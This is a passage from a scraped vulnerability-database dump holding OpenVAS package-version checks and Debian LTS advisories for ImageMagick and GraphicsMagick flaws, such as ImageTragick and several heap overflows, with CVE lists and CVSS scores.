script_name(\"Ubuntu Update for imagemagick USN-2990-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'imagemagick'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Nikolay Ermishkin and Stewie discovered\n that ImageMagick incorrectly sanitized untrusted input. A remote attacker could\n use these issues to execute arbitrary code. These issues are known as\n 'ImageTragick'. This update disables problematic coders via the\n /etc/ImageMagick-6/policy.xml configuration file. In certain environments the\n coders may need to be manually re-enabled after making sure that ImageMagick does\n not process untrusted input. (CVE-2016-3714, CVE-2016-3715, CVE-2016-3716,\n CVE-2016-3717, CVE-2016-3718)\n\n Bob Friesenhahn discovered that ImageMagick allowed injecting commands via\n an image file or filename. A remote attacker could use this issue to\n execute arbitrary code. (CVE-2016-5118)\");\n script_tag(name:\"affected\", value:\"imagemagick on Ubuntu 16.04 LTS,\n Ubuntu 15.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2990-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2990-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|16\\.04 LTS|15\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.7.7.10-6ubuntu3.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"imagemagick-common\", ver:\"8:6.7.7.10-6ubuntu3.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagick++5\", ver:\"8:6.7.7.10-6ubuntu3.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagickcore5\", ver:\"8:6.7.7.10-6ubuntu3.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.6.9.7-5ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"imagemagick-common\", ver:\"8:6.6.9.7-5ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagick++4\", ver:\"8:6.6.9.7-5ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagickcore4\", ver:\"8:6.6.9.7-5ubuntu3.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.8.9.9-7ubuntu5.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"imagemagick-6.q16\", ver:\"8:6.8.9.9-7ubuntu5.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"imagemagick-common\", ver:\"8:6.8.9.9-7ubuntu5.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagick++-6.q16-5v5\", ver:\"8:6.8.9.9-7ubuntu5.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2\", ver:\"8:6.8.9.9-7ubuntu5.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU15.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.8.9.9-5ubuntu2.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"imagemagick-6.q16\", ver:\"8:6.8.9.9-5ubuntu2.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"imagemagick-common\", ver:\"8:6.8.9.9-5ubuntu2.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagick++-6.q16-5v5\", ver:\"8:6.8.9.9-5ubuntu2.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2\", ver:\"8:6.8.9.9-5ubuntu2.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-05T18:44:42", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-07-01T00:00:00", "type": "openvas", "title": "Fedora Update for GraphicsMagick FEDORA-2019-425a1aa7c9", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13063", "CVE-2017-14997", "CVE-2017-13775", "CVE-2018-6799", "CVE-2017-17502", "CVE-2017-13737", "CVE-2017-11722", "CVE-2017-18220", "CVE-2017-12936", "CVE-2017-17498", "CVE-2017-13736", "CVE-2017-13648", "CVE-2017-11638", "CVE-2017-17503", "CVE-2019-11474", "CVE-2017-12805", "CVE-2017-14994", "CVE-2017-16547", "CVE-2017-15238", "CVE-2017-15930", "CVE-2017-18219", "CVE-2017-17500", "CVE-2017-14504", "CVE-2017-13065", "CVE-2017-12806", "CVE-2017-11642", "CVE-2017-14733", "CVE-2017-16545", "CVE-2019-11472", "CVE-2019-11470", "CVE-2017-12937", "CVE-2017-12935", "CVE-2017-17501", "CVE-2017-13064", "CVE-2017-14649", "CVE-2019-11473"], "modified": "2019-07-04T00:00:00", "id": "OPENVAS:1361412562310876546", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876546", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876546\");\n script_version(\"2019-07-04T09:58:18+0000\");\n script_cve_id(\"CVE-2017-18219\", \"CVE-2017-18220\", \"CVE-2018-6799\", \"CVE-2017-14504\", \"CVE-2017-14649\", \"CVE-2017-14733\", \"CVE-2017-14994\", \"CVE-2017-14997\", \"CVE-2017-15238\", \"CVE-2017-15930\", \"CVE-2017-16545\", \"CVE-2017-16547\", \"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-11638\", \"CVE-2017-11642\", \"CVE-2017-11722\", \"CVE-2017-12935\", \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13648\", \"CVE-2017-13736\", \"CVE-2017-13737\", \"CVE-2017-13775\", \"CVE-2017-12805\", \"CVE-2017-12806\", \"CVE-2019-11470\", \"CVE-2019-11472\", \"CVE-2019-11474\", \"CVE-2019-11473\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:58:18 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-07-01 02:10:46 +0000 (Mon, 01 Jul 2019)\");\n script_name(\"Fedora Update for GraphicsMagick FEDORA-2019-425a1aa7c9\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-425a1aa7c9\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WHIKB4TP6KBJWT2UIPWL5MWMG5QXKGEJ\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'GraphicsMagick'\n package(s) announced via the FEDORA-2019-425a1aa7c9 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"GraphicsMagick is a comprehensive image processing package which is initially\nbased on ImageMagick 5.5.2, but which has undergone significant re-work by\nthe GraphicsMagick Group to significantly improve the quality and performance\nof the software.\");\n\n script_tag(name:\"affected\", value:\"'GraphicsMagick' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick\", rpm:\"GraphicsMagick~1.3.32~1.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-07-05T18:45:24", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-07-01T00:00:00", "type": "openvas", "title": "Fedora Update for GraphicsMagick FEDORA-2019-da4c20882c", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13063", "CVE-2017-14997", "CVE-2017-13775", "CVE-2018-6799", "CVE-2017-17502", "CVE-2017-13737", "CVE-2017-11722", "CVE-2017-18220", "CVE-2017-12936", "CVE-2017-17498", "CVE-2017-13736", "CVE-2017-13648", "CVE-2017-11638", "CVE-2017-17503", "CVE-2019-11474", "CVE-2017-12805", "CVE-2017-14994", "CVE-2017-16547", "CVE-2017-15238", "CVE-2017-15930", "CVE-2017-18219", "CVE-2017-17500", "CVE-2017-14504", "CVE-2017-13065", "CVE-2017-12806", "CVE-2017-11642", "CVE-2017-14733", "CVE-2017-16545", "CVE-2019-11472", "CVE-2019-11470", "CVE-2017-12937", "CVE-2017-12935", "CVE-2017-17501", "CVE-2017-13064", "CVE-2017-14649", "CVE-2019-11473"], "modified": "2019-07-04T00:00:00", "id": "OPENVAS:1361412562310876545", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876545", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876545\");\n script_version(\"2019-07-04T09:58:18+0000\");\n script_cve_id(\"CVE-2017-18219\", \"CVE-2017-18220\", \"CVE-2018-6799\", \"CVE-2017-14504\", \"CVE-2017-14649\", \"CVE-2017-14733\", \"CVE-2017-14994\", \"CVE-2017-14997\", \"CVE-2017-15238\", \"CVE-2017-15930\", \"CVE-2017-16545\", \"CVE-2017-16547\", \"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-11638\", \"CVE-2017-11642\", \"CVE-2017-11722\", \"CVE-2017-12935\", \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13648\", \"CVE-2017-13736\", \"CVE-2017-13737\", \"CVE-2017-13775\", \"CVE-2017-12805\", \"CVE-2017-12806\", \"CVE-2019-11470\", \"CVE-2019-11472\", \"CVE-2019-11474\", \"CVE-2019-11473\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:58:18 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-07-01 02:10:17 +0000 (Mon, 01 Jul 2019)\");\n script_name(\"Fedora Update for GraphicsMagick FEDORA-2019-da4c20882c\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-da4c20882c\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PF62B5PJA2JDUOCKJGUQO3SPL74BEYSV\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'GraphicsMagick'\n package(s) announced via the FEDORA-2019-da4c20882c advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"GraphicsMagick is a comprehensive image processing package which is initially\nbased on ImageMagick 5.5.2, but which has undergone significant re-work by\nthe GraphicsMagick Group to significantly improve the quality and performance\nof the software.\");\n\n script_tag(name:\"affected\", value:\"'GraphicsMagick' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick\", rpm:\"GraphicsMagick~1.3.32~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-31T18:34:54", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-05-19T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for GraphicsMagick (openSUSE-SU-2016:1326-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851317", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851317", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851317\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-19 05:22:09 +0200 (Thu, 19 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for GraphicsMagick (openSUSE-SU-2016:1326-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'GraphicsMagick'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for GraphicsMagick fixes the following issues:\n\n Security issues fixed:\n\n - Multiple security issues in GraphicsMagick/ImageMagick [boo#978061]\n (CVE-2016-3714, CVE-2016-3718, CVE-2016-3715, CVE-2016-3717)\");\n\n script_tag(name:\"affected\", value:\"GraphicsMagick on openSUSE Leap 42.1, openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:1326-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick\", rpm:\"GraphicsMagick~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick-debuginfo\", rpm:\"GraphicsMagick-debuginfo~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick-debugsource\", rpm:\"GraphicsMagick-debugsource~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick-devel\", rpm:\"GraphicsMagick-devel~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libGraphicsMagick++-Q16-3\", rpm:\"libGraphicsMagick++-Q16-3~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libGraphicsMagick++-Q16-3-debuginfo\", rpm:\"libGraphicsMagick++-Q16-3-debuginfo~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libGraphicsMagick++-devel\", rpm:\"libGraphicsMagick++-devel~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libGraphicsMagick-Q16-3\", rpm:\"libGraphicsMagick-Q16-3~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libGraphicsMagick-Q16-3-debuginfo\", rpm:\"libGraphicsMagick-Q16-3-debuginfo~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libGraphicsMagick3-config\", rpm:\"libGraphicsMagick3-config~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libGraphicsMagickWand-Q16-2\", rpm:\"libGraphicsMagickWand-Q16-2~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libGraphicsMagickWand-Q16-2-debuginfo\", rpm:\"libGraphicsMagickWand-Q16-2-debuginfo~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-GraphicsMagick\", rpm:\"perl-GraphicsMagick~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-GraphicsMagick-debuginfo\", rpm:\"perl-GraphicsMagick-debuginfo~1.3.20~3.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-08-05T05:18:07", "description": "\nThe NSFocus Security Team discovered multiple security issues in\nGraphicsmagick, a collection of image processing tools. Several\nheap-based buffer over-reads may lead to a denial-of-service\n(application crash) or possibly have other unspecified impact when\nprocessing a crafted file.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n1.3.16-1.1+deb7u16.\n\n\nWe recommend that you upgrade your graphicsmagick packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-08T00:00:00", "type": "osv", "title": "graphicsmagick - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17782", "CVE-2017-17912", "CVE-2017-17915"], "modified": "2022-08-05T05:18:04", "id": "OSV:DLA-1231-1", "href": "https://osv.dev/vulnerability/DLA-1231-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-05T05:19:46", "description": "\nVarious security issues were found and fixed in graphicsmagick in Debian\nwheezy LTS.\n\n\n* [CVE-2016-7446](https://security-tracker.debian.org/tracker/CVE-2016-7446)\nHeap buffer overflow issue in MVG/SVG rendering.\n* [CVE-2016-7447](https://security-tracker.debian.org/tracker/CVE-2016-7447)\nHeap overflow of the EscapeParenthesis() function\n* [CVE-2016-7449](https://security-tracker.debian.org/tracker/CVE-2016-7449)\nTIFF related problems due to use of strlcpy use.\n* [CVE-2016-7800](https://security-tracker.debian.org/tracker/CVE-2016-7800)\nFix unsigned underflow leading to heap overflow when\n parsing 8BIM chunk.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n1.3.16-1.1+deb7u4.\n\n\nWe recommend that you upgrade your graphicsmagick packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-11T00:00:00", "type": "osv", "title": "graphicsmagick - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7446", "CVE-2016-7447", "CVE-2016-7449", "CVE-2016-7800"], "modified": "2022-08-05T05:19:44", "id": "OSV:DLA-651-1", "href": "https://osv.dev/vulnerability/DLA-651-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-05T05:18:02", "description": "\n* [CVE-2017-13776](https://security-tracker.debian.org/tracker/CVE-2017-13776) /\n [CVE-2017-13777](https://security-tracker.debian.org/tracker/CVE-2017-13777)\ndenial of service issue in ReadXBMImage()\n* [CVE-2017-12935](https://security-tracker.debian.org/tracker/CVE-2017-12935)\nThe ReadMNGImage function in coders/png.c mishandles large MNG\n images, leading to an invalid memory read in the\n SetImageColorCallBack function in magick/image.c.\n* [CVE-2017-12936](https://security-tracker.debian.org/tracker/CVE-2017-12936)\nThe ReadWMFImage function in coders/wmf.c has a use-after-free\n issue for data associated with exception reporting.\n* [CVE-2017-12937](https://security-tracker.debian.org/tracker/CVE-2017-12937)\nThe ReadSUNImage function in coders/sun.c has a colormap\n heap-based buffer over-read.\n* [CVE-2017-13063](https://security-tracker.debian.org/tracker/CVE-2017-13063) /\n [CVE-2017-13064](https://security-tracker.debian.org/tracker/CVE-2017-13064)\nheap-based buffer overflow vulnerability in the function\n GetStyleTokens in coders/svg.c\n* [CVE-2017-13065](https://security-tracker.debian.org/tracker/CVE-2017-13065)\nNULL pointer dereference vulnerability in the function\n SVGStartElement in coders/svg.c\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n1.3.16-1.1+deb7u9.\n\n\nWe recommend that you upgrade your graphicsmagick packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": 